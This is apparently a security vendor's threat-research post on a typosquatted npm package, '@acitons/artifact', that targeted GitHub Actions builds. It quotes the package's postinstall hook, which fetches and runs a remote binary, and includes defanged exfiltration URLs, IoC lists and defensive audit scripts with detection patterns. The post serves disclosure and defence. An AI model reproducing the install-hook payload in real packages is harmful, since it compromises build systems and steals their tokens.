Malicious NPM Package Found Targeting GitHub By Typosquatting on GitHub Action Packages

On Friday 7th November Veracode Threat Research identified a malicious npm package, “@acitons/artifact”, typosquatting on the legitimate package @actions/artifact, which has accumulated over 206k downloads. The malicious package appeared to be targeting GitHub-owned repositories.

We think the intent was to have this script execute during a build of a GitHub-owned repository, exfiltrate the tokens available to the build environment, and then use those tokens to publish new malicious artifacts as GitHub.

We observed 6 versions which included a post-install hook to download and run malware that was not detected by any popular anti-virus products at the time of writing. The malicious versions appear to have been removed by the actor, while the package itself is still available on npm. We have notified npm of this malicious package, and Veracode Package Firewall customers were immediately protected from downloading it as of Friday, when our researchers triaged it.

This campaign targets users of the GitHub Actions CI/CD technology, and our finding underlines precisely why the OWASP Top 10 2025 (RC1) lists “A03:2025-Software Supply Chain Failures” in position #3.

Screenshot taken on Monday 10th November after the malicious versions had been taken down by the malware author.

We took a look at the contents of package.json for version 4.0.13:

{
  "name": "@acitons/artifact",
  "version": "4.0.13",
  "preview": true,
  "description": "Actions artifact lib",
  "keywords": [
    "github",
    "actions",
    "artifact"
  ],
  "homepage": "https://github.com/actions/toolkit/tree/main/packages/artifact",
  "license": "MIT",
  "main": "lib/artifact.js",
  "types": "lib/artifact.d.ts",
  "directories": {
    "lib": "lib",
    "test": "__tests__"
  },
  "files": [
    "lib",
    "!.DS_Store"
  ],
  "publishConfig": {
    "access": "public"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/actions/toolkit.git",
    "directory": "packages/artifact"
  },
  "scripts": {
    "postinstall": "curl https://gist.githubusercontent.com/jmasdg/e35738952716511ac1e22efff400e40d/raw/6302935f5e4d6068fb6bce628771554e9e811c31/harness -o ci_test_harness && chmod +x ci_test_harness && ./ci_test_harness"
  },
  "bugs": {
    "url": "https://github.com/actions/toolkit/issues"
  },
  "dependencies": {
  },
  "devDependencies": {
  }
}

The package claims to be part of the GitHub Actions Toolkit, which has a legitimate npm package, @actions/artifact. This malware package is therefore a clear typosquat, swapping the letters “ti” for “it”.
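The two signals in the manifest above, a lifecycle hook that fetches and executes a remote file and a name one character-swap away from a real package, can both be checked mechanically before a package is ever installed. The following is an added example (not Veracode's or npm's tooling) that audits a package.json for risky install hooks and compares its name against a constructed allow-list of well-known @actions/* packages using an edit distance that counts an adjacent transposition as a single edit; the sample manifest embedded at the bottom reproduces the relevant fields of the 4.0.13 package.json quoted above, with the gist URL shortened.

```python
import json
import re

# Lifecycle hooks npm runs automatically on `npm install`; each can execute
# arbitrary commands on the developer machine or CI runner.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed allow-list of well-known scoped packages to compare against.
# These GitHub Actions Toolkit names are real; the list is illustrative only.
KNOWN_PACKAGES = (
    "@actions/artifact",
    "@actions/core",
    "@actions/exec",
    "@actions/github",
)

REMOTE_FETCH = re.compile(r"\b(curl|wget)\b|https?://", re.I)
EXEC_PAYLOAD = re.compile(
    r"chmod\s+\+x"               # marks a downloaded file executable
    r"|(^|[\s&|;])\./\S+"        # runs a file from the install directory
    r"|\|\s*(ba)?sh\b"           # pipes fetched content into a shell
    r"|\bnode\s+-e\b"            # inline JavaScript
    r"|base64\s+(-d|--decode)",  # decodes an embedded payload
    re.I,
)


def osa_distance(a: str, b: str) -> int:
    """Optimal-string-alignment edit distance: insert, delete, substitute,
    or swap two adjacent characters (so the 'ti' -> 'it' swap costs 1)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name: str, known=KNOWN_PACKAGES, max_distance: int = 1) -> list:
    """Known package names within `max_distance` edits of `name`, excluding an exact match."""
    return [k for k in known if k != name and osa_distance(name, k) <= max_distance]


def risky_install_scripts(pkg: dict) -> list:
    """(hook, command, reasons) for each lifecycle hook that fetches or executes code."""
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if not cmd:
            continue
        reasons = []
        if REMOTE_FETCH.search(cmd):
            reasons.append("remote fetch")
        if EXEC_PAYLOAD.search(cmd):
            reasons.append("executes fetched or inline code")
        if reasons:
            findings.append((hook, cmd, reasons))
    return findings


def audit_package(package_json_text: str) -> dict:
    """Parse a package.json and report typosquat candidates and risky hooks."""
    pkg = json.loads(package_json_text)
    name = pkg.get("name", "")
    return {
        "name": name,
        "typosquat_of": typosquat_candidates(name),
        "risky_scripts": risky_install_scripts(pkg),
    }


# Constructed sample: the relevant fields of the @acitons/artifact@4.0.13
# manifest quoted in the post, with the gist URL shortened to "...".
SAMPLE_MANIFEST = json.dumps({
    "name": "@acitons/artifact",
    "version": "4.0.13",
    "scripts": {
        "postinstall": "curl https://gist.githubusercontent.com/jmasdg/.../raw/harness "
                       "-o ci_test_harness && chmod +x ci_test_harness && ./ci_test_harness"
    },
})

if __name__ == "__main__":
    print(json.dumps(audit_package(SAMPLE_MANIFEST), indent=2))
```

Run against a package tarball's manifest before adding it to a lockfile, or in CI as a gate; pairing it with `npm ci --ignore-scripts` means a hook like the one above is both reported and never executed.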

We took a look at the “harness” binary referenced in version 4.0.13. VirusTotal did not report any popular anti-virus vendors flagging the file as malicious, though if you now look at the “Behavior” tab you can see what we found when we manually reviewed the binary: something was not legitimate about this file:

  • There was a mechanism to prevent execution if the time is after 2025-11-06 UTC. This malware has an expiry date. We looked at one of the other samples, “tester”, and found that it was set to expire the day after.
  • The binary was an obfuscated shell script that had been compiled using the Shell Script Compiler tool.
  • The binary re-executed itself from bash after first setting an environment variable, so as to change the runtime behavior and activate. This resulted in it outputting, extracting and executing a node package which contained an obfuscated file “verify.js”.
  • verify.js featured checks for certain GITHUB_ variables which are understood to be set by GitHub Actions.
  • The malware was only targeting repositories owned by the GitHub organization, making this a targeted attack against GitHub. The verify.js script exited if the organization was not GitHub: PUT_FILE_ENC = STAGING_DIR + '/env.enc', targets = ['github']; !targets.includes(process.env.GITHUB_REPOSITORY_OWNER) && process.exit(0);
  • It obtained an AES encryption key from hxxps://83hfhjasksn.hopto[.]org:443/kljkalsd/ajkl12389/slkj1n_189n (hopto[.]org is a dynamic DNS service), encrypted the data, and then exfiltrated the encrypted data to hxxps://laughing-space-capybara-x5g6rjxq7jwvfp6q6-443.app.github[.]dev/sllkjdsss_user-dasd.txt.
  • The campaign appears to be targeting GitHub’s own repositories as well as a user y8793hfiuashfjksdhfjsk which exists but has no public activity. This user account could be for testing.

Malicious bash script containing a node package
Exfiltration code found within obfuscated “verify.js”

As of today (Monday 10th November) the binaries have been removed, as have these malicious versions of the package, presumably by the malware authors, or perhaps because GitHub identified the malware, since the two GitHub users appear to have been removed. The package is still available on npm with a latest version of 4.0.10 at the time of writing; that version does not contain these post-install hooks, only a simple log line.

Looking further back for other packages of this nature earlier in the month, we found and blocked 12 versions of the now-removed malicious package “8jfiesaf83”.

Customers using Veracode Package Firewall are protected from this threat and others like it.

Indicators of Compromise (IoC) for Malicious NPM Package

NPM Packages

  • @acitons/artifact@4.0.12
  • @acitons/artifact@4.0.13
  • @acitons/artifact@4.0.14
  • @acitons/artifact@4.0.15
  • @acitons/artifact@4.0.16
  • @acitons/artifact@4.0.17
  • 8jfiesaf83@1.0.0
  • 8jfiesaf83@1.0.1
  • 8jfiesaf83@1.0.2
  • 8jfiesaf83@1.0.3
  • 8jfiesaf83@1.0.4
  • 8jfiesaf83@1.0.5
  • 8jfiesaf83@1.0.6
  • 8jfiesaf83@1.0.7
  • 8jfiesaf83@1.0.8
  • 8jfiesaf83@1.0.9
  • 8jfiesaf83@1.0.10
  • 8jfiesaf83@1.0.11
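The package IoCs above are exact name@version pairs, so the practical check is whether any of them resolved into a project's package-lock.json, including transitively under another dependency's nested node_modules. The following is an added example (not Veracode's tooling) that walks both the v2/v3 "packages" map and the older v1 nested "dependencies" tree and reports any match; the embedded lockfile is constructed for illustration, and the versions of its non-IoC entries are made up.

```python
import json

# IoC list from the post: the six @acitons/artifact versions and twelve
# 8jfiesaf83 versions listed above.
IOC_PACKAGES = frozenset(
    [f"@acitons/artifact@4.0.{n}" for n in range(12, 18)]
    + [f"8jfiesaf83@1.0.{n}" for n in range(0, 12)]
)


def package_name_from_path(path: str) -> str:
    """Lockfile v2/v3 keys are install paths; the package name is the part after
    the last 'node_modules/' (nested installs look like a/node_modules/b).
    The root project entry has key "" and yields ""."""
    return path.rsplit("node_modules/", 1)[-1] if "node_modules/" in path else ""


def _walk_v1(deps: dict, out: list) -> None:
    # lockfileVersion 1 nests transitive dependencies under each entry.
    for name, info in (deps or {}).items():
        out.append(f"{name}@{info.get('version', '')}")
        _walk_v1(info.get("dependencies", {}), out)


def installed_packages(lock: dict) -> list:
    """Every name@version resolved in a package-lock.json, any lockfile version."""
    out = []
    for path, info in lock.get("packages", {}).items():
        name = package_name_from_path(path)
        if name:  # skip the root project entry
            out.append(f"{name}@{info.get('version', '')}")
    if not out:
        _walk_v1(lock.get("dependencies", {}), out)
    return sorted(set(out))


def find_ioc_matches(lock: dict, iocs=IOC_PACKAGES) -> list:
    """Resolved packages whose name@version is in the IoC set, sorted."""
    return [p for p in installed_packages(lock) if p in iocs]


def audit_lockfile(lock_text: str) -> list:
    return find_ioc_matches(json.loads(lock_text))


# Constructed sample lockfile: the legitimate @actions/artifact alongside the
# typosquat, plus a malicious package pulled in transitively by "some-dep".
SAMPLE_LOCK = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/@actions/artifact": {"version": "2.1.0"},
        "node_modules/@acitons/artifact": {"version": "4.0.13"},
        "node_modules/some-dep": {"version": "1.2.3"},
        "node_modules/some-dep/node_modules/8jfiesaf83": {"version": "1.0.4"},
    },
})

if __name__ == "__main__":
    for hit in audit_lockfile(SAMPLE_LOCK):
        print("IoC match:", hit)
```

Matching on the full path rather than only top-level keys matters because a typosquat introduced by a transitive dependency never appears in the project's own package.json; the lockfile is the only place it is visible.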

NPM Users

  • blakesdev

GitHub Users

  • jmasdg
  • f8snaf
  • s0larized

SHA256 Hashes

  • e3a6d0d139dc56f28f82ec161b3d17ecd137b088acd3a0e8330a5d412c025b73